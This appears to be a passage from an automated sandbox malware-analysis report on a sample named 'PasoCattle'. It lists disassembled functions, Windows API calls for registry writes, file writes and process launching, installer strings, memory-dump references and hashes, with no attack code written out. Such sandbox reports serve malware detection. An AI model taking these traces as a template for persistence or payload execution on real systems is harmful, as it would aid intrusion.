EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98

Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: Could not load %s, xrefs: 004024DB
`G, xrefs: 0040246E

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
API String ID: 1033533793-4193110038
Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D

Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403E10
GetSysColor.USER32(00000000), ref: 00403E2C
SetTextColor.GDI32(?,00000000), ref: 00403E38
SetBkMode.GDI32(?,?), ref: 00403E44
GetSysColor.USER32(?), ref: 00403E57
SetBkColor.GDI32(?,?), ref: 00403E67
DeleteObject.GDI32(?), ref: 00403E81
CreateBrushIndirect.GDI32(?), ref: 00403E8B

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042A4AD,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042A4AD,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D

Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
GetMessagePos.USER32 ref: 0040489D
ScreenToClient.USER32(?,?), ref: 004048B5
SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED

Strings

f, xrefs: 004048C9

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00012C00,00000064,00103847), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58

Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
CharNextW.USER32(?,?,?,00000000), ref: 004060D6
CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Strings

*?|<>/":, xrefs: 004060B6

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
